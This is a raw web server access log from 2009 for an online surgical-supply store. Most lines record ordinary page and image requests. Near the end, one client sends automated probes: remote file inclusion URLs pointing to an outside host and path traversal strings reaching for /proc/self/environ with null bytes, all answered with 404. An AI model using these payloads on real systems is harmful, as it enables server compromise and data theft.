83.132.125.167 - - [01/Jul/2009:05:41:42 -0400] "GET /images/head_btn-brochures.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
83.132.125.167 - - [01/Jul/2009:05:41:42 -0400] "GET /images/head_btn-space1.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
83.132.125.167 - - [01/Jul/2009:05:41:42 -0400] "GET /images/head_btn-shop.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
83.132.125.167 - - [01/Jul/2009:05:41:42 -0400] "GET /images/head_surgical-supply.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
83.132.125.167 - - [01/Jul/2009:05:41:42 -0400] "GET /images/head_btn-aboutUs.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
83.132.125.167 - - [01/Jul/2009:05:41:42 -0400] "GET /images/head_btn-seminars.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
83.132.125.167 - - [01/Jul/2009:05:41:42 -0400] "GET /images/head_btn-tutorials.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
83.132.125.167 - - [01/Jul/2009:05:41:42 -0400] "GET /images/head_btn-conventions.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
83.132.125.167 - - [01/Jul/2009:05:41:42 -0400] "GET /images/head_btn-contactUs.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
83.132.125.167 - - [01/Jul/2009:05:41:42 -0400] "GET /images/head_btn-spacer2.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
83.132.125.167 - - [01/Jul/2009:05:41:42 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
83.132.125.167 - - [01/Jul/2009:05:41:42 -0400] "GET /images/psearch_go.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
83.132.125.167 - - [01/Jul/2009:05:41:44 -0400] "GET /images/blend.jpg HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
83.132.125.167 - - [01/Jul/2009:05:41:44 -0400] "GET /images/cat_dot.gif HTTP/1.1" 200 45 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
83.132.125.167 - - [01/Jul/2009:05:41:44 -0400] "GET /images/cat_link.gif HTTP/1.1" 200 46 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
83.132.125.167 - - [01/Jul/2009:05:41:44 -0400] "GET /images/cat_expand.gif HTTP/1.1" 200 79 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
83.132.125.167 - - [01/Jul/2009:05:41:45 -0400] "GET /images/head_aceLogo-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
83.132.125.167 - - [01/Jul/2009:05:41:45 -0400] "GET /images/head_btn-shop-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
83.132.125.167 - - [01/Jul/2009:05:41:45 -0400] "GET /images/head_btn-products-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
83.132.125.167 - - [01/Jul/2009:05:41:45 -0400] "GET /images/head_btn-catalog-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
83.132.125.167 - - [01/Jul/2009:05:41:45 -0400] "GET /images/head_btn-brochures-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
83.132.125.167 - - [01/Jul/2009:05:41:45 -0400] "GET /images/head_btn-aboutUs-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
83.132.125.167 - - [01/Jul/2009:05:41:45 -0400] "GET /images/head_btn-tutorials-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
83.132.125.167 - - [01/Jul/2009:05:41:45 -0400] "GET /images/head_btn-seminars-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
83.132.125.167 - - [01/Jul/2009:05:41:45 -0400] "GET /images/head_btn-conventions-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
83.132.125.167 - - [01/Jul/2009:05:41:46 -0400] "GET /images/head_btn-contactUs-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
83.132.125.167 - - [01/Jul/2009:05:42:14 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
83.132.125.167 - - [01/Jul/2009:05:42:14 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
83.132.125.167 - - [01/Jul/2009:05:42:15 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L0129D2476BA3E2005740071+M37+ENG HTTP/1.1" 200 37503 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
83.132.125.167 - - [01/Jul/2009:05:42:17 -0400] "GET /images/head_btn-products.gif HTTP/1.1" 200 1531 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0129D2476BA3E2005740071+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
83.132.125.167 - - [01/Jul/2009:05:42:17 -0400] "GET /images/head_btn-brochures.gif HTTP/1.1" 200 1768 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0129D2476BA3E2005740071+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
83.132.125.167 - - [01/Jul/2009:05:42:17 -0400] "GET /images/head_aceLogo.gif HTTP/1.1" 200 984 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0129D2476BA3E2005740071+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
83.132.125.167 - - [01/Jul/2009:05:42:17 -0400] "GET /images/head_btn-catalogs.gif HTTP/1.1" 200 1729 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0129D2476BA3E2005740071+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
83.132.125.167 - - [01/Jul/2009:05:42:17 -0400] "GET /images/head_btn-shop.gif HTTP/1.1" 200 1970 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0129D2476BA3E2005740071+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
83.132.125.167 - - [01/Jul/2009:05:42:17 -0400] "GET /images/head_btn-space1.gif HTTP/1.1" 200 5036 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0129D2476BA3E2005740071+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
83.132.125.167 - - [01/Jul/2009:05:42:17 -0400] "GET /images/head_surgical-supply.gif HTTP/1.1" 200 764 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0129D2476BA3E2005740071+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
83.132.125.167 - - [01/Jul/2009:05:42:17 -0400] "GET /images/head_btn-aboutUs.gif HTTP/1.1" 200 1459 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0129D2476BA3E2005740071+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
83.132.125.167 - - [01/Jul/2009:05:42:17 -0400] "GET /images/head_btn-tutorials.gif HTTP/1.1" 200 1160 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0129D2476BA3E2005740071+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
83.132.125.167 - - [01/Jul/2009:05:42:17 -0400] "GET /images/head_btn-seminars.gif HTTP/1.1" 200 1250 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0129D2476BA3E2005740071+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
83.132.125.167 - - [01/Jul/2009:05:42:17 -0400] "GET /images/head_btn-conventions.gif HTTP/1.1" 200 1367 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0129D2476BA3E2005740071+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
83.132.125.167 - - [01/Jul/2009:05:42:18 -0400] "GET /images/head_btn-contactUs.gif HTTP/1.1" 200 1235 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0129D2476BA3E2005740071+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
83.132.125.167 - - [01/Jul/2009:05:42:18 -0400] "GET /images/head_btn-spacer2.gif HTTP/1.1" 200 2237 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0129D2476BA3E2005740071+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
83.132.125.167 - - [01/Jul/2009:05:42:18 -0400] "GET /images/blend.jpg HTTP/1.1" 200 405 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0129D2476BA3E2005740071+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
83.132.125.167 - - [01/Jul/2009:05:42:18 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0129D2476BA3E2005740071+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
83.132.125.167 - - [01/Jul/2009:05:42:19 -0400] "GET /images/head_aceLogo-over.gif HTTP/1.1" 200 1296 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0129D2476BA3E2005740071+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
83.132.125.167 - - [01/Jul/2009:05:42:19 -0400] "GET /images/head_btn-shop-over.gif HTTP/1.1" 200 1473 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0129D2476BA3E2005740071+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
83.132.125.167 - - [01/Jul/2009:05:42:19 -0400] "GET /images/head_btn-products-over.gif HTTP/1.1" 200 1396 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0129D2476BA3E2005740071+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
83.132.125.167 - - [01/Jul/2009:05:42:19 -0400] "GET /images/head_btn-catalog-over.gif HTTP/1.1" 200 1354 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0129D2476BA3E2005740071+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
83.132.125.167 - - [01/Jul/2009:05:42:19 -0400] "GET /images/head_btn-brochures-over.gif HTTP/1.1" 200 1392 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0129D2476BA3E2005740071+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
83.132.125.167 - - [01/Jul/2009:05:42:19 -0400] "GET /images/head_btn-aboutUs-over.gif HTTP/1.1" 200 1156 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0129D2476BA3E2005740071+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
83.132.125.167 - - [01/Jul/2009:05:42:19 -0400] "GET /images/head_btn-tutorials-over.gif HTTP/1.1" 200 1097 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0129D2476BA3E2005740071+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
83.132.125.167 - - [01/Jul/2009:05:42:19 -0400] "GET /images/head_btn-seminars-over.gif HTTP/1.1" 200 1089 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0129D2476BA3E2005740071+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
83.132.125.167 - - [01/Jul/2009:05:42:19 -0400] "GET /images/head_btn-conventions-over.gif HTTP/1.1" 200 1195 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0129D2476BA3E2005740071+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
83.132.125.167 - - [01/Jul/2009:05:42:19 -0400] "GET /images/head_btn-contactUs-over.gif HTTP/1.1" 200 1110 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0129D2476BA3E2005740071+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
83.132.125.167 - - [01/Jul/2009:05:42:22 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0129D2476BA3E2005740071+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
83.132.125.167 - - [01/Jul/2009:05:42:23 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L0129D249653352007960071+M37+ENG HTTP/1.1" 200 76795 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0129D2476BA3E2005740071+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
83.132.125.167 - - [01/Jul/2009:05:42:26 -0400] "GET /images/cat_dot.gif HTTP/1.1" 200 45 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0129D249653352007960071+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
83.132.125.167 - - [01/Jul/2009:05:42:26 -0400] "GET /images/cat_expand.gif HTTP/1.1" 200 79 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0129D249653352007960071+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
83.132.125.167 - - [01/Jul/2009:05:42:26 -0400] "GET /images/cat_link.gif HTTP/1.1" 200 46 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0129D249653352007960071+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
219.94.194.231 - - [01/Jul/2009:05:42:33 -0400] "GET /logs/access_log.Q109051100//forum.php?act=http://www.fatemg.edu.br/portal/buggsbunny?? HTTP/1.1" 404 235 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)"
219.94.194.231 - - [01/Jul/2009:05:42:33 -0400] "GET //forum.php?act=http://www.fatemg.edu.br/portal/buggsbunny?? HTTP/1.1" 404 208 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)"
219.94.194.231 - - [01/Jul/2009:05:42:33 -0400] "GET /logs/access_log.Q109051100/errors.php?error=http://www.fatemg.edu.br/portal/buggsbunny?? HTTP/1.1" 404 235 "-" "Mozilla/4.61 [en] (OS/2; U)"
219.94.194.231 - - [01/Jul/2009:05:42:34 -0400] "GET /errors.php?error=http://www.fatemg.edu.br/portal/buggsbunny?? HTTP/1.1" 404 208 "-" "Mozilla/4.61 [en] (OS/2; U)"
219.94.194.231 - - [01/Jul/2009:05:42:34 -0400] "GET /logs/access_log.Q109051100//forum.php?act=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 235 "-" "XXXXXX"
219.94.194.231 - - [01/Jul/2009:05:42:34 -0400] "GET //forum.php?act=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 208 "-" "XXXXXX"
219.94.194.231 - - [01/Jul/2009:05:42:34 -0400] "GET //forum.php?act=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 208 "-" "XXXXXX"
219.94.194.231 - - [01/Jul/2009:05:42:34 -0400] "GET /logs/access_log.Q109051100//forum.php?act=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 235 "-" "XXXXXX"
219.94.194.231 - - [01/Jul/2009:05:42:37 -0400] "GET /logs//forum.php?act=http://www.fatemg.edu.br/portal/buggsbunny?? HTTP/1.1" 404 213 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)"
219.94.194.231 - - [01/Jul/2009:05:42:38 -0400] "GET /logs/errors.php?error=http://www.fatemg.edu.br/portal/buggsbunny?? HTTP/1.1" 404 213 "-" "Mozilla/4.61 [en] (OS/2; U)"
219.94.194.231 - - [01/Jul/2009:05:42:38 -0400] "GET /logs//forum.php?act=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 213 "-" "XXXXXX"
219.94.194.231 - - [01/Jul/2009:05:42:38 -0400] "GET /logs//forum.php?act=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 213 "-" "XXXXXX"
83.132.125.167 - - [01/Jul/2009:05:42:52 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L0129D2406BE3120088B0071+M37+ENG HTTP/1.1" 200 46907 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
